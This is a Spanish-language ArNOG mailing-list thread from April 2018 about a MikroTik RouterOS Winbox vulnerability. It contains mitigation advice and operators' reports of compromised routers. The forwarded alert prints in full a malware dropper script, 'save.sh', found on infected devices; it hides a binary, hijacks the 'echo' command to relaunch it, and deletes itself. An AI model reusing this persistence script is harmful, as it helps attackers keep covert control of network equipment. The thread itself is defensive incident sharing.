<HTML><HEAD></HEAD>
<BODY dir=ltr>
<DIV dir=ltr>
<DIV style="FONT-SIZE: 12pt; FONT-FAMILY: 'Calibri'; COLOR: #000000">
<DIV> </DIV>
<DIV>Nosotros fuimos víctimas de esto hace unos 10 dias atrás (eso quiere decir
que puede hacer bastante tiempo que está) en un CCR 1036 que no estaba lo
suficientemente cerrado al exterior y fué exactamente de esa manera.... lo
sospechoso es el tema que lo primero que hace (que aparece en el log) es “ip
services changed by .....” y tiene que ser un script que lo corre porque el log
tiene el mismo timestamp que el logueo vía Winbox.</DIV>
<DIV> </DIV>
<DIV>No encontramos ningún cambio aparente en “ip services” (revisamos todo lo
que se puede ver en un CCR).</DIV>
<DIV> </DIV>
<DIV>Era de un cliente, por lo que se lo actualizó (SO y firmware), se cambiaron
las pass y se cerro el equipo para cualquier servicio exterior y “en apariencia”
esta funcionando normalmente (no tiene mucha exigencia por ser de un
cliente).</DIV>
<DIV> </DIV>
<DIV>OJO, no hay nada sospechoso, así que puede haber muchos infectados porque
solo aparece eso en el log hasta que se sobreescribe..... salvo que esten
logueando a un syslog.</DIV>
<DIV> </DIV>
<DIV>Saludos </DIV>
<DIV> </DIV>
<DIV style="FONT-SIZE: 12pt; FONT-FAMILY: 'Calibri'; COLOR: #000000">Ing. Jose
Luis Gaspoz<BR>Internet Services S.A.<BR>Tel: 0342-4565118<BR>Cel:
342-5008523</DIV>
<DIV
style='FONT-SIZE: small; TEXT-DECORATION: none; FONT-FAMILY: "Calibri"; FONT-WEIGHT: normal; COLOR: #000000; FONT-STYLE: normal; DISPLAY: inline'>
<DIV style="FONT: 10pt tahoma">
<DIV> </DIV>
<DIV style="BACKGROUND: #f5f5f5">
<DIV style="font-color: black"><B>From:</B> <A title=carriers@dainus.net
href="mailto:carriers@dainus.net">Carriers</A> </DIV>
<DIV><B>Sent:</B> Tuesday, April 24, 2018 7:06 AM</DIV>
<DIV><B>To:</B> <A title=lista@arnog.com.ar
href="mailto:lista@arnog.com.ar">lista@arnog.com.ar</A> ; <A
title=lista@arnog.com.ar href="mailto:lista@arnog.com.ar">lista@arnog.com.ar</A>
</DIV>
<DIV><B>Subject:</B> Re: [Lista ArNOG] Alerta seguridad
Mikrotik</DIV></DIV></DIV>
<DIV> </DIV></DIV>
<DIV
style='FONT-SIZE: small; TEXT-DECORATION: none; FONT-FAMILY: "Calibri"; FONT-WEIGHT: normal; COLOR: #000000; FONT-STYLE: normal; DISPLAY: inline'>
<DIV>Estimados ojo con esa versión yo tube un par de
problemas se me iban los ping altisimos . al parecer hay cambios en
el enrutamiento<BR><BR></DIV>
<DIV class=gmail_quote>En 24 de abril de 2018, en 06:46, Juan Pablo Orsi <<A
href="mailto:juanpablo@internetlocal.com.ar"
target=_blank>juanpablo@internetlocal.com.ar</A>> escribió:
<BLOCKQUOTE class=gmail_quote
style="PADDING-LEFT: 1ex; MARGIN: 0pt 0pt 0pt 0.8ex; BORDER-LEFT: rgb(204,204,204) 1px solid">
<DIV class=entry-content
style="BOX-SIZING: border-box; BORDER-TOP: 0px; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; PADDING-BOTTOM: 0px; TEXT-ALIGN: justify; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; LINE-HEIGHT: 1.62em; PADDING-RIGHT: 0px; font-variant-numeric: inherit; font-variant-east-asian: inherit; font-stretch: inherit">
<P
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; COLOR: rgb(51,51,51); PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px 0px 24px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">En
el día de hoy <A
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; COLOR: rgb(33,117,155); PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; BACKGROUND-COLOR: transparent; font-stretch: inherit"
href="http://mikrotik.com/" target=_blank>MikroTik</A> ha publicado un<SPAN
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; COLOR: rgb(255,0,0); PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit"> <A
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; COLOR: rgb(255,0,0); PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; BACKGROUND-COLOR: transparent; font-stretch: inherit"
href="https://forum.mikrotik.com/viewtopic.php?f=21&t=133533&p=656255"
rel=noopener target=_blank><SPAN
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; FONT-WEIGHT: 600; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">alerta
de seguridad</SPAN></A> sobre una <SPAN
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; FONT-WEIGHT: 600; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">vulnerabilidad
en el RouterOS que afecta a todas las versiones desde la
v6.29.</SPAN></SPAN></P>
<P
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; COLOR: rgb(51,51,51); PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px 0px 24px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">Según
el alerta, indica que la vulnerabilidad ha sido descubierta por ellos mismos y
que recomiendan actualizar <SPAN
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; FONT-WEIGHT: 600; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">ASAP</SPAN>
(<SPAN
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; FONT-WEIGHT: 600; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">lo
mas pronto posible</SPAN>).</P>
<BLOCKQUOTE
style='BOX-SIZING: border-box; QUOTES: none; BORDER-TOP: 0px; FONT-FAMILY: georgia,"URW Bookman L",serif; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; COLOR: rgb(68,68,68); PADDING-BOTTOM: 0px; FONT-STYLE: italic; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px 30px 0px 60px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit'>
<P
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit"><SPAN
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; FONT-WEIGHT: 600; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">La
vulnerabilidad permite a una “<EM
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">herramienta
especial</EM>” conectar al puerto del Winbox y poder solicitar la base de
datos de los usuarios del sistema.</SPAN></P></BLOCKQUOTE>
<P
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; COLOR: rgb(51,51,51); PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px 0px 24px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">Para
tomar una medida al respecto se recomienda:</P>
<UL
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; COLOR: rgb(51,51,51); PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px 0px 24px 30px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">
<LI
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 4px 0px 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">Actualizar
a la<SPAN
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; FONT-WEIGHT: 600; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">
v6.42.1</SPAN> y <SPAN
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; FONT-WEIGHT: 600; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">v6.43rc4</SPAN>
*<SPAN
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; COLOR: rgb(255,102,0); PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit"><SPAN
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; FONT-WEIGHT: 600; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">Con
precaución</SPAN></SPAN>(leer mas adelante)
<LI
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 4px 0px 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit"><SPAN
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; FONT-WEIGHT: 600; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">Cerrar
el puerto del Winbox para el acceso publico</SPAN>mediante un <EM
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">address
list</EM> y el <EM
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">firewall</EM>
en el chain <EM
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">input</EM>
<LI
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 4px 0px 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit"><SPAN
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; FONT-WEIGHT: 600; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">Limitar
el rango de IP permitidos</SPAN> en <EM
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">ip
> service > winbox</EM> a las redes locales unicamente.
<LI
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 4px 0px 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit"><SPAN
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; FONT-WEIGHT: 600; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">Cambiar
las contraseñas de los usuarios.</SPAN></LI></UL>
<P
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; COLOR: rgb(51,51,51); PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px 0px 24px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit"><SPAN
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; FONT-WEIGHT: 600; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">Es
importante tener en cuenta</SPAN>que en las recientes versiones del <SPAN
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; FONT-WEIGHT: 600; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">RouterOS</SPAN><SPAN
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; FONT-WEIGHT: 600; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">
existe un nuevo esquema en el manejo del bridge</SPAN>, porque lo hay que
tener ciertas precauciones al actualizar debido a que se han dado casos de
actualizaciones fallidas en configuraciones que tienen bridge y utilizan el
chip switch.</P>
<P
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; COLOR: rgb(51,51,51); PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px 0px 24px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">En
caso de equipos que se encuentren en producción y no es posible
actualizar rápidamente el sistema operativo, es <SPAN
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; FONT-WEIGHT: 600; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit"><SPAN
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; COLOR: rgb(255,0,0); PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">mandatorio
que se cierre el acceso del winbox y cambiar las contraseñas de los
usuarios.</SPAN></SPAN></P>
<P
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; COLOR: rgb(51,51,51); PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px 0px 24px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">Por
el momento no es posible conocer o detectar que el sistema ha sido vulnerado,
por lo que también se recomienda aplicar el punto anterior.</P>
<P
style="BOX-SIZING: border-box; BORDER-TOP: 0px; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px 0px 24px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-variant-numeric: inherit; font-variant-east-asian: inherit; font-stretch: inherit"><FONT
color=#333333 face="Lato, sans-serif"><SPAN style="FONT-SIZE: 17px"><A
href="https://forum.mikrotik.com/viewtopic.php?f=21&t=133533&p=656255">https://forum.mikrotik.com/viewtopic.php?f=21&t=133533&p=656255</A></SPAN></FONT><BR></P>
<H4
style='BOX-SIZING: border-box; FONT-SIZE: 18px; BORDER-TOP: 0px; FONT-FAMILY: "Open Sans",sans-serif; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; FONT-WEIGHT: 300; COLOR: ; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px 0px 18px; BORDER-LEFT: 0px; LETTER-SPACING: 1px; LINE-HEIGHT: 1.62em; PADDING-RIGHT: 0px; font-stretch: inherit'><SPAN
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; COLOR: rgb(255,0,0); PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit"><SPAN
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; FONT-WEIGHT: 600; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">ACTUALIZACION</SPAN></SPAN>:</H4>
<P
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; COLOR: rgb(51,51,51); PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px 0px 24px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">Algunos
usuarios están reportan que detectan dos archivos dentro de <EM
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit"><SPAN
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; FONT-WEIGHT: 600; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">files</SPAN></EM>
con el nombre de <EM
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit"><SPAN
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; FONT-WEIGHT: 600; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">dnstest</SPAN></EM>
con contenido binario y <SPAN
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; FONT-WEIGHT: 600; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit"><EM
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">save.sh</EM>
c</SPAN>on el siguiente contenido:</P><PRE style='BOX-SIZING: border-box; OVERFLOW: auto; WORD-WRAP: break-word; MARGIN-BOTTOM: 24px; FONT-SIZE: 12px; BORDER-TOP: rgb(227,227,227) 1px dashed; FONT-FAMILY: monaco,consolas,"Lucida Console","Bitstream Vera Sans Mono",monospace; BORDER-RIGHT: rgb(227,227,227) 1px dashed; BACKGROUND: rgb(248,248,248); BORDER-BOTTOM: rgb(227,227,227) 1px dashed; WORD-BREAK: break-all; COLOR: rgb(0,0,0); PADDING-BOTTOM: 15px; PADDING-TOP: 15px; PADDING-LEFT: 15px; BORDER-LEFT: rgb(227,227,227) 1px dashed; MARGIN-TOP: 0px; LINE-HEIGHT: 1.62em; PADDING-RIGHT: 15px; font-stretch: inherit; border-radius: 4px'>#!/bin/ash
case "$PATH" in
*/usr/local/bin*)
# old versions
dest="/usr/local/bin/"
;;
*)
dest="/flash/bin/"
if [ ! -d "/flash/" ]; then
exit 1
fi
;;
esac
if [ -f $dest/.dnstest ]; then
rm $dest/.dnstest
fi
if [ -f $dest/echo ]; then
rm $dest/echo
fi
if [ -f $dest/.test ]; then
rm $dest/.test
fi
mkdir -p $dest
export PATH=$PATH:$dest
chmod a+x /flash/rw/pckg/dnstest
cp /flash/rw/pckg/dnstest $dest/.dnstest
echo -e "#!/bin/ash\nusleep 180000000\ncp $dest.dnstest /tmp/.dnstest\n/tmp/.dnstest*" > $dest/.test
chmod +x $dest/.test
echo -e "#!/bin/ash\n/$dest.test&\n/bin/echo \$*" > $dest/echo
chmod +x $dest/echo
/flash/rw/pckg/dnstest
rm save.sh
</PRE>
<P
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; COLOR: rgb(51,51,51); PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px 0px 24px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit"><SPAN
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; FONT-WEIGHT: 600; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">El
intento tiene el siguiente comportamiento:</SPAN></P>
<P
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; COLOR: rgb(51,51,51); PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px 0px 24px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">Como
se observa en la siguiente captura, el primer acceso es un intento fallido del
winbox, por lo que se presume que tiene el acceso a la DB de usuarios. Luego
el acceso es con el usuario con permisos <EM
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">full.</EM></P>
<P
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; COLOR: rgb(51,51,51); PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px 0px 24px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit"><IMG
style="BORDER-LEFT-WIDTH: 0px; BOX-SIZING: border-box; MAX-WIDTH: 100%; HEIGHT: auto; FONT-FAMILY: inherit; BORDER-RIGHT-WIDTH: 0px; VERTICAL-ALIGN: middle; BORDER-BOTTOM-WIDTH: 0px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; PADDING-RIGHT: 0px; BORDER-TOP-WIDTH: 0px; font-stretch: inherit"
alt="Comportamiento de Acceso"
src="https://i.imgur.com/7XbVAWy.png"></P></DIV><PRE class=blue><HR><BR>Lista mailing list<BR>Lista@arnog.com.ar<BR><A href="http://mailmancabase.interdotnet.com.ar/mailman/listinfo/lista">http://mailmancabase.interdotnet.com.ar/mailman/listinfo/lista</A><BR></PRE></BLOCKQUOTE></DIV>
<DIV id=DAB4FAD8-2DD7-40BB-A1B8-4E2AA1F9FDF2><BR>
<TABLE style="BORDER-TOP: #d3d4de 1px solid; COLOR: #000000">
<TBODY>
<TR>
<TD style="WIDTH: 55px; PADDING-TOP: 18px"><A
href="http://www.avg.com/email-signature?utm_medium=email&utm_source=link&utm_campaign=sig-email&utm_content=emailclient"
target=_blank><IMG style="HEIGHT: 29px; WIDTH: 46px" alt=""
src="https://ipmcdn.avast.com/images/icons/icon-envelope-tick-green-avg-v1.png"
width=46 height=29></A></TD>
<TD
style="FONT-SIZE: 13px; FONT-FAMILY: arial, helvetica, sans-serif; WIDTH: 470px; COLOR: #41424e; PADDING-TOP: 17px; LINE-HEIGHT: 18px">Libre
de virus. <A style="COLOR: #4453ea"
href="http://www.avg.com/email-signature?utm_medium=email&utm_source=link&utm_campaign=sig-email&utm_content=emailclient"
target=_blank>www.avg.com</A> </TD></TR></TBODY></TABLE></DIV>
<P>
<HR>
_______________________________________________<BR>Lista mailing
list<BR>Lista@arnog.com.ar<BR>http://mailmancabase.interdotnet.com.ar/mailman/listinfo/lista<BR></DIV></DIV></DIV></BODY></HTML>